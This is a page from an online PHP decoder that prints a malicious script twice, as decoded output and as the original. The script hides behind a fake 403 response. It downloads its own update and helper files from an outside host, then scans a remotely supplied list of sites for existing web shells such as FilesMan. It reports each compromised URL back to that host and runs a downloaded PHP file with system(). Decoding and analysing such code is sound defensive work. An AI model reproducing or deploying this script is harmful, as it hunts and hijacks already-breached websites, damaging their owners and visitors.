Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo b..
Decoded Output download
<?php
if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Rm9yYmlkZGVuPC9oMT4KPHA+WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A+Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
?>
<?php
file_put_contents(basename(__FILE__),file_get_contents('http://32868.port0.org/st/get_wp-plugins.txt'));
file_put_contents('list.txt',file_get_contents('http://32868.port0.org/st/list.txt'));
file_put_contents('roll.txt',file_get_contents('http://32868.port0.org/st/roll.txt'));
file_put_contents('angry.txt',file_get_contents('http://32868.port0.org/st/angry.txt'));
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
require_once('roll.txt');
require_once('angry.txt');
function callback_function($response, $info, $request) {
if (preg_match('~(FilesTools)~i', $response, $out)) {
if (preg_match('~(FilesMan)~i', $response, $out)) {
file_get_contents('http://32868.port0.org/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.wp-plugins.php'));goto end;
}
}
if (preg_match("~(<input type=hidden name=p1 value='uploadFile'>)~i", $response, $out)) {
file_get_contents('http://32868.port0.org/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.wp-plugins.php'));goto end;
}
end:
return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen("http://32868.port0.org/get_wp-plugins.php", "r");
while(!feof($f)) {
$url = trim(fgets($f));
$parse = parse_url($url);
$hostname = $parse['host'];
$AC->get($url);
}
$AC->execute(50);
system('php inc.class.wp-plugins.php');
?>
Did this file decode correctly?
Original Code
<?php
if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Rm9yYmlkZGVuPC9oMT4KPHA+WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A+Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
?>
<?php
file_put_contents(basename(__FILE__),file_get_contents('http://32868.port0.org/st/get_wp-plugins.txt'));
file_put_contents('list.txt',file_get_contents('http://32868.port0.org/st/list.txt'));
file_put_contents('roll.txt',file_get_contents('http://32868.port0.org/st/roll.txt'));
file_put_contents('angry.txt',file_get_contents('http://32868.port0.org/st/angry.txt'));
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
require_once('roll.txt');
require_once('angry.txt');
function callback_function($response, $info, $request) {
if (preg_match('~(FilesTools)~i', $response, $out)) {
if (preg_match('~(FilesMan)~i', $response, $out)) {
file_get_contents('http://32868.port0.org/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.wp-plugins.php'));goto end;
}
}
if (preg_match("~(<input type=hidden name=p1 value='uploadFile'>)~i", $response, $out)) {
file_get_contents('http://32868.port0.org/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.wp-plugins.php'));goto end;
}
end:
return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen("http://32868.port0.org/get_wp-plugins.php", "r");
while(!feof($f)) {
$url = trim(fgets($f));
$parse = parse_url($url);
$hostname = $parse['host'];
$AC->get($url);
}
$AC->execute(50);
system('php inc.class.wp-plugins.php');
?>
Function Calls
None |
Stats
MD5 | f73c616f3757bb38495d36fcbd1ec136 |
Eval Count | 0 |
Decode Time | 89 ms |